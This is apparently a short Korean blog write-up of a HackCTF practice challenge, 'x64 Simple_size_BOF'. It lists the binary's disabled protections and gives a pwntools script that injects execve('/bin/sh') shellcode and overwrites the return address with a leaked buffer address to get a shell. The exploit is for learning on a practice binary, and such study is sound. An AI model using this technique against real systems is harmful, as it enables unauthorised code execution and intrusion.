[hackctf] x64 Simple_size_BOF

sangjuns

·

2021. 4. 18. 17:34

 

문제 소스

 

 

보호기법

gdb-peda$ checksec 
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial

 

문제 분석 및 페이로드

from pwn import *
context.arch='x86_64'
p=process("./Simple_size_bof")
p.recvuntil("buf: ")
addr=p.recvline()[:-1]
shell=asm(shellcraft.execve("/bin/sh",0,0))
print len(shell)
pay=shell
pay+="A"*(0x6d30-37)
pay+='B'*0x8
pay+=p64(int(addr,16))

p.sendline(pay)

p.interactive() 

 

 

참고문헌 및 힘들었던 부분

 

'War Games > hack-ctf' 카테고리의 다른 글

[hackctf] offset  (0) 2021.04.18
[hackctf] Simple_Overflow_ver_2  (0) 2021.04.18
[hackctf] x64 Buffer Overflow  (0) 2021.04.18
[hackctf] 내 버퍼가 흘러넘친다  (0) 2021.04.18
[hackctf] basic_fsb  (0) 2021.04.18